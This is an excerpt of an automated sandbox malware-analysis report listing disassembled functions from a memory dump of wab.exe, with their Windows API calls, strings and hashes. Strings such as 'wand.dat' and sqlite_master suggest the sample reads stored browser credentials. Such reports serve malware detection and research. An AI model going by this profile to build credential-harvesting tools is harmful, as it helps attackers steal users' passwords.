                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                  • String ID: MS Sans Serif
                                                  • API String ID: 210187428-168460110
                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                  Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcsicmpmemset
                                                  • String ID: edit
                                                  • API String ID: 2747424523-2167791130
                                                  • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                  • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                  Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                  • API String ID: 3150196962-1506664499
                                                  • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                  • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                  Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memcmp
                                                  • String ID:
                                                  • API String ID: 3384217055-0
                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                  Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$memcpy
                                                  • String ID:
                                                  • API String ID: 368790112-0
                                                  • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                  • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                  Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                  • GetMenu.USER32(?), ref: 00410F8D
                                                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                  • String ID:
                                                  • API String ID: 1889144086-0
                                                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                  Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                  • GetLastError.KERNEL32 ref: 0041810A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                  • String ID:
                                                  • API String ID: 1661045500-0
                                                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                  Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                  • memcpy.MSVCRT ref: 0042EC7A
                                                  Strings
                                                  • virtual tables may not be altered, xrefs: 0042EBD2
                                                  • Cannot add a column to a view, xrefs: 0042EBE8
                                                  • sqlite_altertab_%s, xrefs: 0042EC4C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                  • API String ID: 1297977491-2063813899
                                                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                  Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040560C
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                  • String ID: *.*$dat$wand.dat
                                                  • API String ID: 2618321458-1828844352
                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                  Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                  • wcslen.MSVCRT ref: 00410C74
                                                  • _wtoi.MSVCRT ref: 00410C80
                                                  • _wcsicmp.MSVCRT ref: 00410CCE
                                                  • _wcsicmp.MSVCRT ref: 00410CDF
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                  • String ID:
                                                  • API String ID: 1549203181-0
                                                  • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                  • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                  Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00412057
                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                  • String ID:
                                                  • API String ID: 3550944819-0
                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                  Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                  • memcpy.MSVCRT ref: 0040A94F
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                  • String ID:
                                                  • API String ID: 3023356884-0
                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                  Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                  • memcpy.MSVCRT ref: 0040B248
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                  • String ID:
                                                  • API String ID: 3023356884-0
                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                  Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: @
                                                  • API String ID: 3510742995-2766056989
                                                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                  Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  • String ID:
                                                  • API String ID: 1865533344-0
                                                  • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                  • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                  Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • strlen.MSVCRT ref: 0040B0D8
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                  • memcpy.MSVCRT ref: 0040B159
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocstrlen
                                                  • String ID:
                                                  • API String ID: 1171893557-0
                                                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                  Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004144E7
                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                    • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                  • memset.MSVCRT ref: 0041451A
                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                  • String ID:
                                                  • API String ID: 1127616056-0
                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                  Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: sqlite_master
                                                  • API String ID: 438689982-3163232059
                                                  • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                  • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                  Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                  • wcscpy.MSVCRT ref: 00414DF3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                  • String ID:
                                                  • API String ID: 3917621476-0
                                                  • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                  • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                  Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                  • _snwprintf.MSVCRT ref: 00410FE1
                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • _snwprintf.MSVCRT ref: 0041100C
                                                  • wcscat.MSVCRT ref: 0041101F
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                  • String ID:
                                                  • API String ID: 822687973-0
                                                  • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                  • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                  Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7726DF80,?,0041755F,?), ref: 00417452
                                                  • malloc.MSVCRT ref: 00417459
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7726DF80,?,0041755F,?), ref: 00417478
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                  • String ID:
                                                  • API String ID: 4284152360-0
                                                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                  Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                  • String ID:
                                                  • API String ID: 2678498856-0
                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
